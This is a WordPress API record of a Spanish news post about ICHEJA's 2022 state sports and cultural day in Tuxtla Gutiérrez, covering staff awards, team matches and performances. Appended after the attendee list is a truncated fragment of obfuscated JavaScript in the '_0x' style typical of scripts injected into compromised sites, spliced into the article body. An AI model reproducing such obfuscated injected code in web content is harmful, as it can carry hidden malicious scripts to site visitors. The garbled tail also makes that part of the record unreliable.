{"id":5081,"date":"2022-09-14T02:29:52","date_gmt":"2022-09-14T02:29:52","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=5081"},"modified":"2022-09-14T02:29:53","modified_gmt":"2022-09-14T02:29:53","slug":"icheja-realiza-segunda-jornada-estatal-deportiva-y-cultural-2022","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=5081","title":{"rendered":"ICHEJA realiza Segunda Jornada Estatal Deportiva y Cultural 2022"},"content":{"rendered":"\n<figure class=\"wp-block-gallery has-nested-images columns-default is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\">\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"488\" data-id=\"5082\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1-1024x488.jpeg\" alt=\"\" class=\"wp-image-5082\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1-1024x488.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1-300x143.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1-768x366.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"441\" data-id=\"5083\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1024x441.jpeg\" alt=\"\" class=\"wp-image-5083\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-1024x441.jpeg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-300x129.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM-768x331.jpeg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/09\/WhatsApp-Image-2022-09-13-at-3.24.38-PM.jpeg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n<\/figure>\n\n\n\n<ul class=\"wp-block-list\"><li>Trabajadores con 35 y 40 a\u00f1os de servicio fueron condecorados, as\u00ed como trabajadores destacados por productividad de este instituto.<\/li><\/ul>\n\n\n\n<ul class=\"wp-block-list\"><li>Se realizaron encuentros deportivos entre los selectivos de futbol, basquetbol y voleibol, asimismo, se realizaron demostraciones art\u00edsticas y culturales.<\/li><\/ul>\n\n\n\n<p>Redacci\u00f3n.<\/p>\n\n\n\n<p>13 de septiembre del 2022. <strong>Tuxtla Guti\u00e9rrez, Chiapas. &#8211; <\/strong>En el marco de los festejos del 41 Aniversario del INEA y el D\u00eda Internacional de la Alfabetizaci\u00f3n, el Instituto de Educaci\u00f3n para J\u00f3venes y Adultos (Icheja) realiz\u00f3 la Segunda Jornada Estatal Deportiva y Cultural 2022.<\/p>\n\n\n\n<p>Estas actividades deportivas, art\u00edsticas y culturales, se realizaron a fin de promover las manifestaciones creativas, y a su vez la integraci\u00f3n, adem\u00e1s de la sana convivencia entre el personal de las diversas \u00e1reas y coordinaciones que conforman este instituto.<\/p>\n\n\n\n<p>Al inaugurar las actividades deportivas en las inmediaciones del Parque Recreativo Ca\u00f1a Hueca, el director del Icheja, Gustavo G\u00f3mez Ord\u00f3\u00f1ez, se\u00f1al\u00f3 que las actividades organizadas para este d\u00eda, sirvan para convivir, interactuar y para conocerse, siendo el deporte una herramienta para unir y fortalecer el trabajo educativo; para pasar un buen rato, dirimir diferencias y sobre todo sonre\u00edr.<\/p>\n\n\n\n<p>Por otro lado, el funcionario felicit\u00f3 a las 23 coordinaciones que conforman el instituto, al realizar el trabajo de casa por casa para invitar a la poblaci\u00f3n que no est\u00e1 alfabetizada o que se encuentra en rezago educativo, para que inicien su formaci\u00f3n b\u00e1sica.<\/p>\n\n\n\n<p>En ese mismo contexto G\u00f3mez Ord\u00f3\u00f1ez, destac\u00f3 que pese a los desaf\u00edos y retos que se presentan actualmente como los econ\u00f3micos, los tecnol\u00f3gicos o de otra \u00edndole, la creatividad de los que integran el instituto permiten buscar alternativas para que aumenten las cifras de atenci\u00f3n a la poblaci\u00f3n en rezago educativo, porque dijo, \u201clos tiempos nos est\u00e1n alcanzando y ahora existen metas que cumplir como los modelos educativos en l\u00ednea\u201d, por ello invit\u00f3 a todos para que se logren superar las cifras que actualmente se tienen.<\/p>\n\n\n\n<p>Por otra parte, entre bailables folkl\u00f3ricos, poemas y un concierto de Jazz, organizado y ejecutado por integrantes del Icheja, se realizaron las actividades art\u00edsticas y culturales en la Calzada de los Hombres Ilustres, escenario del talento de los participantes en cada una de las ejecuciones presentadas.<\/p>\n\n\n\n<p>En este evento cultural, fueron condecorados y reconocidos trabajadores con 35 y 40 a\u00f1os de servicio en el Instituto Chiapaneco de Educaci\u00f3n para J\u00f3venes y Adultos, asimismo, se les entregaron reconocimientos a trabajadores destacados por su productividad. Tambi\u00e9n fueron premiados los ganadores de las justas deportivas en las categor\u00edas de f\u00fatbol, b\u00e1squetbol y voleibol.<\/p>\n\n\n\n<p>Finalmente, el director del Icheja, felicit\u00f3 y agradeci\u00f3 a cada uno de los participantes en esta Segunda Jornada Deportiva y Cultural 2022, por la excelente organizaci\u00f3n y ejecuci\u00f3n de las actividades; invit\u00f3 a todos a seguir trabajando con gran \u00edmpetu y dedicaci\u00f3n para seguir abatiendo el rezago educativo en el estado.<\/p>\n\n\n\n<p>Asistieron<strong>: <\/strong>Am\u00e9rica Vanessa Guti\u00e9rrez Hern\u00e1ndez, secretaria t\u00e9cnica del Icheja, Emma Itzel Orantes Ortega, directora general del Centro Estatal de Prevenci\u00f3n de la Violencia y Participaci\u00f3n Ciudadana, Juan Carlos Bonifaz Trujillo, director de Gobierno Municipal, Guillermo Olivera S\u00e1nchez, secretario general del Comit\u00e9 Directivo Seccional 07del Sindicato Nacional de Trabajadores de la Educaci\u00f3n para Adultos (SNTEA).<\/p>\n\n\n\n<p>Emilio G\u00f3mez Ozuna, coordinador de ense\u00f1anza y fomento art\u00edstico del CONECULTA, Roberto Vel\u00e1zquez Ch\u00e1vez<strong>, <\/strong>jefe de oficina de investigaci\u00f3n de la Secretar\u00eda de Educaci\u00f3n, Valeria Estefan\u00eda Rodr\u00edguez G\u00f3mez, del Centro Estatal de Prevenci\u00f3n de la Violencia y Participaci\u00f3n Ciudadana, Mauro Rom\u00e1n Ch\u00e1vez Lastro<strong>, <\/strong>director de Cultura F\u00edsica, Mar\u00eda Lourdes Ruiz Pastrana.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Trabajadores con 35 y 40 a\u00f1os de servicio fueron condecorados, as\u00ed como trabajadores destacados por productividad de este instituto. Se realizaron encuentros deportivos entre los selectivos de futbol, basquetbol y voleibol, asimismo, se realizaron demostraciones art\u00edsticas y culturales. Redacci\u00f3n. 13 de septiembre del 2022. Tuxtla Guti\u00e9rrez, Chiapas. &#8211; En el marco de los festejos del &hellip;<\/p>\n","protected":false},"author":2,"featured_media":5082,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-5081","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=5081"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5081\/revisions"}],"predecessor-version":[{"id":5084,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/5081\/revisions\/5084"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/5082"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=5081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=5081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=5081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}